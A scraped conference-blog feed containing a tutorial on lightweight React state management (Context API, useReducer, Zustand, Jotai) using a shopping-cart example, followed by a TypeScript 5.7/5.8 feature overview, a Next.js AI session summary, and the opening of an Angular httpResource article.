The lightest Redux alternative consists of a custom implementation based on React’s Context API and State Hook. The key advantage is that you don’t need any additional libraries. For example, let’s imagine a shopping cart in a web shop. The cart is one of the shop’s central elements and you need to be able to access it from several different places. In the shop, you should be able to add products to the cart using a list. The list shows the number of items currently in the shopping cart. An overview component shows how many products are in the cart and the total value. Both components – the list and the overview – should be independent of each other but always show the latest information.

Without React’s Context API, the only solution is to store shopping cart data in the state of a component that’s a parent to both components. Then, this passes its state to the components using props. This creates a very right coupling between these components. A better solution is based on the Context API. For this, you need the context, which you create with the createContext function. The provider component of the context binds it to the component tree, supplies it with a concrete value, and allows child components to access it. Since React 19, the context object can also be used directly as a provider. This eliminates needing to take a detour with the context’s provider component. With useContext (or, since React 19, the use function), you can access the context. Listing 1 shows the implementation of CartContext.

Listing 1: Implementing CartContext

import {
  createContext,
  Dispatch,
  FC,
  ReactNode,
  SetStateAction,
  use,
  useState,
} from 'react';
import { Cart } from './types/Cart';

type CartContextType = [Cart, Dispatch<SetStateAction<Cart>>];
const CartContext = createContext<CartContextType | null>(null);

type CartProviderProps = {
  children: ReactNode;
};
export const CartProvider: FC<CartProviderProps> = ({ children }) => {
  const cart = useState<Cart>({ items: [] });

  return <CartContext value={cart}>{children}</CartContext>;
};

export function useCart() {
  const context = use(CartContext);
  if (!context) {
    throw new Error('useCart must be used within a CartProvider');
  }
  return context;
}

The idea behind React’s Context API is that you can store any structure and access it from all child components. The structure can be a simple value like a number or a string, but objects, arrays, and functions are also allowed. In our example, the cart’s state structure is in the context. As usual in React, this is a tuple consisting of the state object, which you can use to read the state, and a function that can change the state. The CartContext can either contain the state structure or the value null. When you call the createContext function, you pass null as the default value. This lets you check if the context provider has been correctly integrated.

The CartProvider component defines the cart state and passes it as a value to the context. It accepts children in the form of a ReactNode object. This lets you integrate the CartProvider component into your component tree and gives all child components access to the context.

The last implementation component is a hook function called useCart. This controls access to the context. The use function provides the context value. If the value is null, it indicates that you should use useCart outside of CartProvider. In this case, the function throws an exception instead of returning the state value.

What does the application code look like when you want to access the state? We’ll use the ListItem component as an example. It accesses the context in both read and write mode. Listing 2 shows the simplified source code for the component.

Listing 2: Accessing the context

import { FC, useRef } from 'react';
import { Product } from './types/Product';
import { useCart } from './CartContext';

type Props = {
  product: Product;
};
const ListItem: FC<Props> = ({ product }) => {
  const inputRef = useRef<HTMLInputElement>(null);

  const [cart, setCart] = useCart();

  function addToCart() {
    const quantity = Number(inputRef.current?.value);
    if (quantity) {
      setCart((prev) => ({
        items: [
          ...prev.items.filter((item) => item.id !== product.id),
          {
            ...product,
            quantity,
          },
        ],
      }));
    }
  }

  return (
    <li>
      {product.name}
      <input
        type="text"
        ref={inputRef}
        defaultValue={
          cart.items.find((item) => item.id === product.id)?.quantity
        }
      />
      <button onClick={addToCart}>add</button>
    </li>
  );
};

export default ListItem;

The ListItem component represents each entry in the product list and displays the product name and an input field where you can specify the number of products you want to add to the shopping cart. When you click the button, the component’s addToCart function updates the cart context. This is possible by using the useCart function to access the state of the shopping cart and entering the current product quantity in the input field. Use the setCart function to update the context.

One disadvantage of this implementation is that the ListItem component has to know the CartContext precisely and performs the state update in the callback function of the setCart function. You can solve this by outsourcing this block as a function. Here, the ListItem component can access the functionality as well as every component in the application.

How Do You Synchronize React State with Server Communication?

This solution only works locally in the browser. If you close the window or if a problem occurs, the current shopping cart disappears. You can solve this by applying the actions locally to the state and saving the operations on the server. But this makes implementation a little more complex. When loading the component structure, you must load the currently valid shopping cart from the server and save it to the state. Then, apply each change both on the server side and in the local state. Although this results in some overhead, the advantage is that the current state can be restored at any time, regardless of the browser instance. If you implement the addToCart functionality as a separate hook function, the components remain unaffected by this adjustment.

Listing 3: Implementing the addToCart Functionality

import {
  createContext,
  Dispatch,
  FC,
  ReactNode,
  SetStateAction,
  use,
  useEffect,
  useRef,
  useState,
} from 'react';
import { Cart } from './types/Cart';
import { Product } from './types/Product';

type CartContextType = [Cart, Dispatch<SetStateAction<Cart>>];
const CartContext = createContext<CartContextType | null>(null);

type CartProviderProps = {
  children: ReactNode;
};
export const CartProvider: FC<CartProviderProps> = ({ children }) => {
  const cart = useState<Cart>({ items: [] });

  useEffect(() => {
    fetch('http://localhost:3001/cart')
      .then((response) => response.json())
      .then((data) => cart[1](data));
  }, []);

  return <CartContext value={cart}>{children}</CartContext>;
};

export function useCart() {
  const context = use(CartContext);
  if (!context) {
    throw new Error('useCart must be used within a CartProvider');
  }
  return context;
}

export function useAddToCart(
  product: Product
): [React.RefObject<HTMLInputElement | null>, () => void] {
  const [cart, setCart] = useCart();
  const inputRef = useRef<HTMLInputElement>(null);

  function addToCart() {
    const quantity = Number(inputRef.current?.value);

    if (quantity) {
      const updatedItems = [
        ...cart.items.filter((item) => item.id !== product.id),
        { ...product, quantity },
      ];

      fetch('http://localhost:3001/cart', {
        method: 'PUT',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ id: 1, items: updatedItems }),
      })
        .then((response) => response.json())
        .then((data) => setCart(data));
    }
  }

  return [inputRef, addToCart] as const;
}

The CartProvider component loads the current shopping cart from the server. How users access the shopping cart depends upon the specific interface implementation. The code in the example assumes that the server makes the shopping cart available for the current user via /cart. One potential solution is to differentiate between users using cookies. The second adjustment consists of the useAddToCart function. It receives a product and generates the addToCart function and the ref for the input field. In the addToCart function, the shopping cart is updated locally, sent to the server, and then the local state is set by calling the setCart function. During implementation, we assume the shopping cart is updated via a PUT request to /cart and that this interface returns the updated shopping cart.

Implementation using a combination of context and state is suitable for manageable use cases. It’s lightweight and flexible, but large applications run the risk of the central state becoming chaotic. One possible fix is no longer exposing the function for modifying the state externally, but using the useReducer hook instead.

How Can You Manage React State Using Actions?

React offers another hook for component state management with the useReducer hook. This differs from the more commonly used useState hook and does not provide a function for changing the state. Instead, it returns a tuple of readable state and a dispatch function. When you call the useReducer function, you pass a reducer function whose task is to generate a new state from the previous state and an action object.

The action object describes the change, like adding products to the shopping cart. Actions are usually simple JavaScript objects with the properties type and payload. The type property specifies the type of action, and the payload provides additional information.

The reducer hook is intended for local state management, but you can easily integrate asynchronous server communication. However, it’s recommended that you separate synchronous local operations from asynchronous server-based operations. The reducer should be a pure function and free of side effects. This means that the same inputs always result in the same outputs and the current state is only changed based on the action provided. If you stick to this rule, your code will be clearer and better structured, and error handling is easier. You’ll also be more flexible when it comes to future software extensions. Listing 4 shows an implementation of state management with the useReducer hook.

Listing 4: Using the useReducer-Hooks

import {
  createContext,
  Dispatch,
  FC,
  ReactNode,
  useContext,
  useEffect,
  useReducer,
} from 'react';
import { Cart, CartItem } from './types/Cart';

const SET_CART = 'setCart';
const ADD_TO_CART = 'addToCartAsync';
const FETCH_CART = 'fetchCart';

type FetchCartAction = {
  type: typeof FETCH_CART;
};

type SetCartAction = {
  type: typeof SET_CART;
  payload: Cart;
};

type AddToCartAsyncAction = {
  type: typeof ADD_TO_CART;
  payload: CartItem;
};

type CartAction = FetchCartAction | SetCartAction | AddToCartAsyncAction;

type CartContextType = [Cart, Dispatch<CartAction>];
const CartContext = createContext<CartContextType | null>(null);

type CartProviderProps = {
  children: ReactNode;
};

function cartReducer(state: Cart, action: CartAction): Cart {
  switch (action.type) {
    case SET_CART:
      return action.payload;

    default:
      throw new Error(`Unhandled action type: ${action.type}`);
  }
}

function cartMiddleware(dispatch: Dispatch<CartAction>, cart: Cart) {
  return async function (action: CartAction) {
    switch (action.type) {
      case FETCH_CART: {
        const response = await fetch('http://localhost:3001/cart');
        const data = await response.json();
        dispatch({ type: SET_CART, payload: data });
        break;
      }
      case ADD_TO_CART: {
        const response = await fetch('http://localhost:3001/cart', {
          method: 'PUT',
          headers: { 'Content-Type': 'application/json' },
          body: JSON.stringify({
            items: [...cart.items, action.payload],
          }),
        });

        const updatedCart = await response.json();
        dispatch({ type: SET_CART, payload: updatedCart });
        break;
      }
      default:
        dispatch(action);
    }
  };
}

export const CartProvider: FC<CartProviderProps> = ({ children }) => {
  const [cart, dispatch] = useReducer(cartReducer, { items: [] });
  const enhancedDispatch = cartMiddleware(dispatch, cart);

  useEffect(() => {
    enhancedDispatch({ type: FETCH_CART });
  }, []);

  return (
    <CartContext.Provider value={[cart, enhancedDispatch]}>
      {children}
    </CartContext.Provider>
  );
};

export function useCart() {
  const context = useContext(CartContext);
  if (!context) {
    throw new Error('useCart must be used within a CartProvider');
  }
  return context;
}

export function useAddToCart() {
  const [, dispatch] = useCart();

  const addToCart = (item: CartItem) => {
    dispatch({ type: ADD_TO_CART, payload: item });
  };

  return addToCart;
}

The CartProvider component is the starting point for implementation. It holds the context and creates the state using the useReducer hook. It also uses the FETCH_CART action to ensure that the existing shopping cart is loaded from the server. The code has two parts: the reducer itself and a middleware. The reducer takes the form of the cartReducer function and is responsible for the local state. It consists of a switch statement and, in this simple example, supports the SET_CART action, which sets the shopping cart. What’s more interesting though is the cartMiddleware function. This is responsible for the asynchronous actions FETCH_CART and ADD_TO_CART. Unlike the reducer, the middleware cannot access the state directly, but must pass changes to the reducer via actions. To do this, it uses the dispatch function from the useReducer hook. The middleware can also have side effects such as asynchronous server communication. For example, the FETCH_CART action triggers a GET request to the server to retrieve the data from the current shopping cart. Once the data is available, it’s written to the local state using the SET_CART action.

If the middleware isn’t responsible for a received action, it passes it directly to the reducer so that you don’t need to distinguish between the two in the application and can simply use the middleware.

The useCart and useAddToCart functions are the interfaces between the application components and the reducer. Listing 5 shows how to use the reducer implementation in your components.

Listing 5: Integrating the reducer implementation

import { FC, useRef } from 'react';
import { Product } from './types/Product';
import { useCart, useAddToCart } from './CartContext';

type Props = {
  product: Product;
};
const ListItem: FC<Props> = ({ product }) => {
  const inputRef = useRef<HTMLInputElement>(null);
  const [cart] = useCart();
  const addToCart = useAddToCart();

  return (
    <li>
      {product.name}{' '}
      <input
        type="text"
        ref={inputRef}
        defaultValue={
          cart.items.find((item) => item.id === product.id)?.quantity
        }
      />{' '}
      <button
        onClick={() =>
          addToCart({ ...product, quantity: Number(inputRef.current?.value) })
        }
      >
        add
      </button>
    </li>
  );
};

export default ListItem;

Read access to the state is still with the useCart function. The useAddToCart function creates a new function that you can pass a new updated item from the shopping cart to. This function generates the necessary action and dispatches it via the middleware.

Both the useState and useReducer approaches require a relatively large amount of boilerplate code around the application’s state management’s business logic. Therefore, libraries exist and “state” is one of the most lightweight.

What Makes Zustand a Scalable State Management Solution?

The Zustand library takes care of the state of an application. The Zustand API is minimalistic, yet the library has all the features you need to centrally manage the state of your application. The stores are the central element, which are created with the create function. They hold the state and provide methods for modification. In your application’s components, you can interact with Zustand’s stores using hook functions. The library lets you perform both synchronous and asynchronous actions and gives the option of storing the state in the browser’s LocalStorage or IndexedDb via middleware. We don’t have to go that far for shopping cart management implementation in our example. It’s enough to load an existing shopping cart from the server and manage it with the list component. It should be possible to access the state from other components, like CartOverview, which shows a summary of the shopping cart.

Before you can use Zustand, you have to install the library with your package manager. You can do this with npm using the command npm add zustand. The library comes with its own type definitions, so you don’t need to install any additional packages to use it in a TypeScript environment.

Create the CartStore outside the components of your application in a separate file. This manages items in the shopping cart. You can control access to the store with the useCartStore function, which gives access to the state and provides methods for adding products and loading the shopping cart from the server. Listing 6 shows the implementation details.

Listing 6: Access to the store

import { create } from 'zustand';
import { CartItem } from './types/Cart';

export type CartStore = {
  cartItems: CartItem[];
  addToCart: (item: CartItem) => Promise<void>;
  loadCart: () => Promise<void>;
};

export const useCartStore = create<CartStore>((set, get) => ({
  cartItems: [],

  addToCart: async (item: CartItem) => {
    set((state) => {
      const existingItemIndex = state.cartItems.findIndex(
        (cartItem) => cartItem.id === item.id
      );

      let updatedCart: CartItem[];
      if (existingItemIndex !== -1) {
        updatedCart = [...state.cartItems];
        updatedCart[existingItemIndex] = item;
      } else {
        updatedCart = [...state.cartItems, item];
      }

      return { cartItems: updatedCart };
    });

    await saveCartToServer(get().cartItems);
  },

  loadCart: async () => {
    const response = await fetch('http://localhost:3001/cart');
    const data: CartItem[] = (await response.json())['items'];
    set({ cartItems: data });
  },
}));

function saveCartToServer(cartItems: CartItem[]): void {
  fetch('http://localhost:3001/cart', {
    method: 'PUT',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ items: cartItems }),
  });
}

The create function of state is implemented as a generic function. This means you can pass the state structure to it. TypeScript helps where needed, whether in your development environment or your application’s build process. Pass a callback function to the create function; you can use the get function for read access and the set function for write access to the state. The set function behaves similarly to React’s setState function. You can use the previous state to define a new structure and use it as the return value. The callback function that you pass to create returns an object structure. Then, define the state structure (in our case, this is cartItems) and methods for accessing it like addToCart and loadCart. The addToCart method is implemented as an async method and manipulates the state with the set function. It also uses the helper function saveCartToServer to send the data to the server. After set is executed, the state already has the updated value, so you can read it with get. Always try to treat the state as a single source of truth.

The asynchronous loadCart method is used to initially fill the state with data from the server. You should execute this method once in a central location to make sure that the state is initialized correctly. Listing 7 shows an example using the application’s app component.

Listing 7: Integrating into the app component

import './App.css';
import List from './List';
import CartOverview from './CartOverview';
import { useCartStore } from './cartStore';
import { useEffect } from 'react';

function App() {
  const { loadCart } = useCartStore();

  useEffect(() => {
    loadCart();
  }, []);

  return (
    <>
      <CartOverview />
      <hr />
      <List />
    </>
  );
}

export default App;

Work with state happens in your application’s components, like the ListItem component. Here, you call the useCartStore function and use the cartItems structure to access the data in the store and add new products using the addToCart method. Listing 8 contains the corresponding code.

Listing 8: Integration into the ListItem component

import { FC, useRef } from 'react';
import { Product } from './types/Product';
import { useCartStore } from './cartStore';

type Props = {
  product: Product;
};
const ListItem: FC<Props> = ({ product }) => {
  const inputRef = useRef<HTMLInputElement>(null);
  const { cartItems, addToCart } = useCartStore();

  return (
    <li>
      {product.name}{' '}
      <input
        type="text"
        ref={inputRef}
        defaultValue={
          cartItems.find((item) => item.id === product.id)?.quantity
        }
      />{' '}
      <button
        onClick={() =>
          addToCart({ ...product, quantity: Number(inputRef.current?.value) })
        }
      >
        add
      </button>
    </li>
  );
};

export default ListItem;

What’s remarkable about State is that you don’t have to worry about integrating a provider. That’s because State doesn’t rely on React’s Context API to manage global state. One disadvantage is that State is truly global. So you can’t have two identical stores with different data states in your component hierarchy’s subtrees. On the other hand, bypassing the Context API has some performance advantages that make Zustand an interesting alternative.

Why Choose Jotai for React State Management?

Similar to Zustand, Jotai is a lightweight library for state management in React. The library works with small, isolated units called atoms and uses React’s Hook API. Like Zustand, Jotai does not use React’s Context API by default. Individual central state elements and the interfaces to it are significantly smaller and clearly separated from each other. The atom function plays a central role, allowing you to define both the structure and the access functions. This definition takes place outside of the application’s components. Connection between the atoms and components is formed by the useAtom function, which enables you to interact with the central state.

You can install the Jotai library with the command npm add jotai. The difference between it and Zustand is that Jotai works with much finer structures. The atom is the central element here. In a simple instance, you pass the initial value to the atom function when you call it and can use it throughout your application. If you’re using TypeScript, you have the option of defining the type of the atom value as generic.

Jotai provides three different hook functions for accessing the atom from a component. useAtom returns a tuple for read and write access. This tuple is similar in structure to the tuple returned by React’s useState hook. useAtomValue returns only the first part of the tuple, giving you read-only access to the atom. The counterpart is the useSetAtom function, which gives you the setter function for the atom. You can already achieve a lot with this structure, but Jotai also lets you combine atoms. To implement the shopping cart state, you create three atoms in total. One represents the shopping cart, one is for adding products, and one is for loading data from the server. Listing 9 shows the implementation details.

Listing 9: Implementing the atoms

import { atom } from 'jotai';
import { CartItem } from './types/Cart';

const cartItemsAtom = atom<CartItem[]>([]);

async function saveCartToServer(cartItems: CartItem[]): Promise<void> {
  await fetch('http://localhost:3001/cart', {
    method: 'PUT',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ items: cartItems }),
  });
}

const addToCartAtom = atom(null, async (get, set, item: CartItem) => {
  const currentCart = get(cartItemsAtom);
  const existingItemIndex = currentCart.findIndex(
    (cartItem) => cartItem.id === item.id
  );

  let updatedCart: CartItem[];
  if (existingItemIndex !== -1) {
    updatedCart = [...currentCart];
    updatedCart[existingItemIndex] = item;
  } else {
    updatedCart = [...currentCart, item];
  }

  set(cartItemsAtom, updatedCart);

  await saveCartToServer(updatedCart);
});

const loadCartAtom = atom(null, async (_get, set) => {
  const response = await fetch('http://localhost:3001/cart');
  const data: CartItem[] = (await response.json())['items'];
  set(cartItemsAtom, data);
});

export { cartItemsAtom, addToCartAtom, loadCartAtom };

You implement your application’s atoms separately from your components. For the cartItemsAtom, call the atom function with an empty array and define the type as a CartItem array. When implementing the business logic, also use the atom function, but pass the value null as the first argument and a function as the second. This creates a derived atom that only allows write access. In the function, you have access to the get and set functions. You can use these to access another atom – in this case, the cartItemsAtom. You can also support additional parameters that are passed when the function is called. For write access with set, pass a reference to the atom and then the updated value. Since the function can be asynchronous, you can easily integrate a side effect like loading data from the server or writing the updated shopping cart. The atoms are integrated into the application components using the Jotai hook functions. Listing 10 shows how this works in the ListItem component example.

Listing 10: Integration in the ListItem Component

import { FC, useRef } from 'react';
import { Product } from './types/Product';
import { useAtom, useAtomValue, useSetAtom } from 'jotai';
import { cartItemsAtom, addToCartAtom } from './cart.atom';

type Props = {
  product: Product;
};
const ListItem: FC<Props> = ({ product }) => {
  const inputRef = useRef<HTMLInputElement>(null);
  const cartItems = useAtomValue(cartItemsAtom);
  const addToCart = useSetAtom(addToCartAtom);

  return (
    <li>
      {product.name}{' '}
      <input
        type="text"
        ref={inputRef}
        defaultValue={
          cartItems.find((item) => item.id === product.id)?.quantity
        }
      />{' '}
      <button
        onClick={() =>
          addToCart({ ...product, quantity: Number(inputRef.current?.value) })
        }
      >
        add
      </button>
    </li>
  );
};

export default ListItem;

For read access, you can use the useAtomValue function directly, since you use the derived atoms for write operations. The useSetAtom function is used for this. To add a product to the shopping cart, simply call the addToCart function with the new shopping cart item. Jotai takes care of everything else. This is also true when updating all components affected by the atom change.

Conclusion

In this article, you learned about different approaches to state management in a React application. We focused on lightweight approaches that don’t dictate your application’s entire architecture. The first approach used React’s very own interfaces – state or reducers and context. This gives you the maximum amount of freedom and flexibility in your implementation, but you also must take care of all the implementation details yourself.

If you’re willing to sacrifice some of this flexibility and accept an extra dependency in your application, libraries like Zustand or Jotai are a helpful alternative. Both libraries take different approaches. Zustand offers a compact solution that concentrates both the structure and logic in one structure. Jotai, on the other hand, works with smaller units and lets you derive or combine these units, making your application more flexible and individual parts easier to exchange. Ultimately, the solution you choose depends upon the use case and your personal preferences.

The post What’s the Best Way to Manage State in React? appeared first on International JavaScript Conference.

]]>
Watch Session: Build AI-Powered Apps with Next.js – Nir Kaufman https://javascript-conference.com/blog/ai-nextjs-nir-kaufman-workshop/ Wed, 09 Jul 2025 16:26:32 +0000 https://javascript-conference.com/?p=108186 In today’s fast-evolving web development landscape, integrating AI into your apps isn't just a trend—it's becoming a necessity. In this hands-on session, Nir Kaufman walks developers through building AI-driven applications using the Next.js framework. Whether you're exploring generative AI, large language models (LLMs), or building smarter interfaces, this session provides the perfect foundation.

The post Watch Session: Build AI-Powered Apps with Next.js – Nir Kaufman appeared first on International JavaScript Conference.

]]>
The session dives deep into practical ways to incorporate AI into web applications using Next.js, covering everything from LLM fundamentals to real-world coding demos.

1. Understanding AI and Large Language Models (LLMs)

The Session begins with an overview of how AI—especially generative AI models—can enhance modern web applications. Nir explains how LLMs understand and generate content based on user queries, opening the door to intelligent, context-aware features.

2. Integrating AI into Next.js

Participants learn how to connect their Next.js projects with AI APIs, fetching and utilizing model-generated data to enhance app functionality. This includes server-side and client-side integration techniques that ensure seamless performance.

3. Creating Intelligent, Adaptive Interfaces

One key highlight is building UIs that dynamically respond to user behavior. Nir demonstrates how to use AI-generated data to create content and interfaces that feel personalized and highly interactive.

4. Hands-On Coding Examples

Throughout the session, attendees follow along with real-world code samples. From generating UI components based on prompts to managing complex application state with AI logic, each example is designed for immediate application.

5. Best Practices for AI Integration

  • Performance: Use caching and smart data-fetching strategies to avoid bottlenecks.
  • Security: Keep API keys secure and handle user data responsibly.
  • Scalability: Design systems that can scale with increasing AI workloads.

iJS Newsletter

Join the JavaScript community and keep up with the latest news!

Key Takeaways

  • AI enhances—rather than replaces—developer capabilities.
  • Dynamic user experiences are possible with personalized content generation.
  • Efficient state management is crucial in AI-enhanced UIs.
  • Security and privacy must be top priorities when dealing with user data and AI APIs.

Conclusion

This session equips developers with the tools and mindset to begin building powerful, AI-driven web applications using Next.js. Nir Kaufman’s practical approach bridges theory with real-world implementation, making it easier than ever to bring AI into your development stack.

If you’re ready to explore AI-powered features and elevate your web applications, this session is a must-watch. Watch the full video above and start turning your ideas into intelligent applications today.

Watch the full session below:

The post Watch Session: Build AI-Powered Apps with Next.js – Nir Kaufman appeared first on International JavaScript Conference.

]]>
What’s New in TypeScript 5.7/5.8 https://javascript-conference.com/blog/typescript-5-7-5-8-features-ecmascript-direct-execution/ Thu, 26 Jun 2025 12:29:50 +0000 https://javascript-conference.com/?p=108154 TypeScript is widely used today for developing modern web applications because it offers several advantages over a pure JavaScript approach. For example, TypeScript's static type system allows the written program code to be checked for errors during development and build time. This is also known as static code analysis and contributes to the long-term maintainability of the project. The two latest versions, TypeScript 5.7 from November 2024 and 5.8 from March 2025, bring several improvements and new features, which we will explore below.

The post What’s New in TypeScript 5.7/5.8 appeared first on International JavaScript Conference.

]]>
Improved Type Safety

TypeScript improves type safety in several areas. Variables that are never initialized are now detected more reliably. If a variable is declared but never assigned a value, the compiler reports an error. In certain situations, however, this cannot be determined unambiguously for TypeScript. Listing 1 shows such a situation: Within the function definition of “printResult()”, TypeScript cannot clearly determine which path is taken in the outer (separate) function. Therefore, TypeScript makes the “optimistic” assumption that the variable will be initialized.

Listing 1: Optimistic type check in different functional contexts

function foo() {
 let result: number
 if (myCondition()) {
   result = myCalculation();
 } else {
   const temporaryWork = myOtherCalculation();
   // Vergessen, 'result' zuzuweisen
 }
 printResult();
 function printResult() {
   console.log(result); // kein Compiler-Error
 }
}

With version 5.7, this situation has been improved, at least in cases where no conditions are used. In Listing 2, the variable “result” is not assigned, but this is also recognized within the function “printResult()” and now results in a compiler error.

iJS Newsletter

Join the JavaScript community and keep up with the latest news!

Listing 2: Optimistic type check in different functional contexts

function foo() {
 let result: number
 // Weitere Logik, in der keine Zuweisung an 'result' erfolgt

 printResult();
 function printResult() {
   console.log(result); 
 // Variable 'result' is used before being assigned.(2454)
 }
}

Another type check ensures that methods with non-literal (or composite, ‘computed’) property names are consistently treated as index signatures in classes. This is shown in Listing 3 using a method that was created using an index signature.

Listing 3: Index signatures for classes

declare const sym: symbol;
export class MyClass {
 [sym]() { return 1; }
}
// Wird interpretiert als
export class MyClass { [x: symbol]: () => number; }

Previously, this method was ignored by the type system. With 5.7, it now appears as an index signature ([x: symbol] signature). This harmonizes the behavior with object literals and can be particularly useful for generic APIs.

Last but not least, version 5.7 introduces a stricter error message under the “noImplicitAny” compiler option. When this option is enabled, function definitions that do not declare an explicit return type are now checked more thoroughly. Functions without a return type are often arrow functions that are used as callback handlers, for example, in promise chains: “catch(() => null)”. If such handlers implicitly return “null” or “undefined,” the error “TS7011: Function expression, which lacks return-type annotation, implicitly has an ‘any’ return type” is now displayed. The typing is therefore stricter here, so that runtime errors can be better avoided in the future.

Latest ECMAScript and Node.js Support

With TypeScript 5.7, ECMAScript version 2024 can now be used as the compile target (e.g., via compiler flag: –target es2024). This is particularly useful for staying up to date and gaining access to the latest language features and new APIs. New APIs include “Object.groupBy()” and “Map.groupBy()”, which can be used to group an iterable or a map. Listing 4 shows this using an array called “inventory” containing various supermarket products. The array is to be divided into two groups: products that are still available (“sufficient”) and products that need to be restocked (‘restock’). The function “Object.groupBy()” is now passed the array to be grouped and a function that returns which group each item in the array belongs to. The return value of the GroupBy function is an object (here the variable “result”) that contains the different groups as parameters. Each group is again an array (see the console.log outputs in Listing 4). If a group does not contain any entries, the entire group is “undefined.”

Listing 4: Arrays gruppieren mittels Object.groupBy()

const inventory = [
 { name: "asparagus", type: "vegetables", quantity: 9 },
 { name: "bananas", type: "fruit", quantity: 5 },
 { name: "cherries", type: "fruit", quantity: 12 }
];

const result = Object.groupBy(inventory, ({ quantity }) =>
 quantity < 10 ? "restock" : "sufficient",
);

console.log(result.restock);
// [{ name: "asparagus", type: "vegetables", quantity: 9 },
//  { name: "bananas", type: "fruit", quantity: 5 }]

console.log(result.sufficient);
// [{ name: "cherries", type: "fruit", quantity: 12 }]

If more complex calculations are performed, or if WASM, multiple workers, and correspondingly complex setups are used, TypedArray classes (e.g., “Uint8Array”), “ArrayBuffer,” and/or “SharedArrayBuffer” are also frequently used. The length of ArrayBuffers can be changed in ES2024 (‘resize()’), while SharedArrayBuffers can ‘only’ grow (‘grow()’). Therefore, both buffer variants obviously have different APIs. However, the TypedArray classes always use a buffer under the hood. To harmonize the newly created API differences, the common supertype ‘ArrayBufferLike’ is used. If a specific implementation is to be used, the buffer type used can now be specified explicitly, as all TypedArray classes are now generically typed with respect to the underlying buffer types. Listing 5 illustrates this, showing that in the case of “Uint8Array,” “view” can always access the correct buffer variant “SharedArrayBuffer.”

Listing 5: TypedArrays mit generischem Buffer-Typ

// Neu: TypedArray mit generischem ArrayBuffer-Typ
interface Uint8Array<T extends ArrayBufferLike = ArrayBufferLike> { /* ... */ }

// Verwendung mit einem konkreten Typen:
// Hier SharedArrayBuffer
const buffer = new SharedArrayBuffer(16, { maxByteLength: 1024 });
const view = new Uint8Array(buffer);

view.buffer.grow(512); // `grow` exisitiert nur auf SharedArrayBuffer

Directly Executable TypeScript

In addition to the new features, TypeScript also supports libraries that enable TypeScript files to be executed directly without a compile step (e.g., “ts-node,” “tsx,” or Node 23.x with “–experimental-strip-types”). Direct execution of TypeScript can speed up development processes, for example, by skipping the build/compile task between development and execution and “catching up” later. This becomes possible when relative imports are adjusted: Normally, imports do not have a file extension (see Listing 6), so that the imports do not have to differ between the source code and the compiled result. However, executing the file directly without translation requires the “.ts” extension (Listing 6). Such an import usually results in a compiler error. With the new compiler option “–rewriteRelativeImportExtensions,” all TypeScript extensions are automatically rewritten (from .ts.tsx.mts.cts to .js.jsx.mjs.cjs). On the one hand, this provides better support for direct execution. On the other hand, it is also possible to use and compile the TypeScript files in the normal TypeScript build process, which is important, for example, for authors of libraries who want to test their files quickly without a compile step, but also need the real TypeScript build before publishing the library.

EVERYTHING AROUND ANGULAR

Explore the iJS Angular Development Track

Listing 6: Import with .ts extension

import {Demo} from './bar'; //<-Standard-Import
import {Demo} from './bar.ts'; //<-Zum direkten Ausführen nötig

If the Node.js option “–experimental-strip-types” is used to execute TypeScript directly, care must be taken to ensure that only TypeScript constructs that are easy to remove (strip) for Node.js are used. To better support this use case, the new compiler option “–erasableSyntaxOnly” has been added in 5.8. This option prohibits TypeScript-only features such as enums, namespaces, parameter properties (see also Listing 7), and special import forms and marks them as compiler errors.

Listing 7: Constructs prohibited under “–erasableSyntaxOnly”

// error: Namespace mit Runtime-Code
namespace container {
}

class Point {
 // error: Implizite Properties/Parameter-Properties
 constructor(public x: number, public y: number) { }
}

// error: Enum-Deklaration
enum Direction {
 Up,
 Down
}

Further Improvements

The TypeScript team naturally wants to make the development process as pleasant as possible for all developers. To this end, it naturally also uses all the new options available under the hood. In Node.js 22, for example, a caching API (“module.enableCompileCache()”) was introduced, which TypeScript now uses to save recurring parsing and compilation costs. In benchmarks, compiling tsc was about two to three times faster than before.

By default, the compiler checks whether special “@typescript/lib-**” packages are installed. These packages can be used to replace the standard TypeScript libraries in order to customize the behavior of what are actually native TypeScript APIs. The check for such library packages was always performed previously, even if no library packages were used. This can mean unnecessary overhead for many files or in large projects. With the new compiler option “–libReplacement=false*,” this behavior can be disabled, which can improve initialization time, especially in very large projects and monorepos.

Support for developer tools is also an important task for TypeScript. Therefore, there have also been updates to project and editor support. When an editor that uses the TS language server loads a file, it searches for the corresponding “tsconfig.json.” Previously, it stopped at the first match, which often led to the editor assigning the wrong configuration to a file in monorepo-like structures and thus not offering correct developer support. With the new TypeScript versions, the project is now searched further up if necessary to find a suitable configuration. For example, in Listing 8, the test file “foo-test.ts” is now correctly used with the configuration “projekt/src/tsconfig.test.json” and not accidentally with the main configuration “projekt/tsconfig.json”. This makes it easier to work in “workspaces” or composite setups with multiple subprojects.

iJS Newsletter

Join the JavaScript community and keep up with the latest news!

Listing 8: Repo structure with multiple TSConfigs

projekt/
├── src/
│   ├── tsconfig.json
│   ├── tsconfig.test.json
│   ├── foo.ts
│   └── foo-test.ts
└── tsconfig.json

Conclusion

TypeScript 5.7 and 5.8 offer a variety of direct and indirect improvements for developers. In particular, they increase type safety (better errors for uninitialized variables, stricter return checks) and bring the language up to date with ECMAScript. At the same time, they improve the developer experience through faster build processes (compile caching, optimized checks), extended Node.js support, and more flexible configuration for monorepos.

The TypeScript team is already working on many large and small improvements for the future. TypeScript 5.9 is in the starting blocks and is scheduled for release at the end of July. In addition, a major change is planned: the TypeScript runtime is to be completely rewritten in Go for version 7. Initial tests have shown that with the help of the new compiler written in Go, it is possible to achieve up to 10 times faster builds for your own projects.

The post What’s New in TypeScript 5.7/5.8 appeared first on International JavaScript Conference.

]]>
Exploring httpResource in Angular 19.2 https://javascript-conference.com/blog/exploring-httpresource-angular-19/ Mon, 19 May 2025 11:30:20 +0000 https://javascript-conference.com/?p=107841 Angular 19.2 introduced the experimental httpResource feature, streamlining HTTP data loading within the reactive flow of applications. By leveraging signals, it simplifies asynchronous data fetching, providing developers with a more streamlined approach to handling HTTP requests. With Angular 20 on the horizon, this feature will evolve further, offering even more power for managing data in reactive applications. Let’s explore how to leverage httpResource to enhance your applications.

The post Exploring httpResource in Angular 19.2 appeared first on International JavaScript Conference.

]]>
As an example, we have a simple application that scrolls through levels in the style of the game Super Mario. Each level consists of tiles that are available in four different styles: overworldundergroundunderwater, and castle. In our implementation, users can switch freely between these styles. Figure 1 shows the first level in overworld style, while Figure 2 shows the same level in underground style.

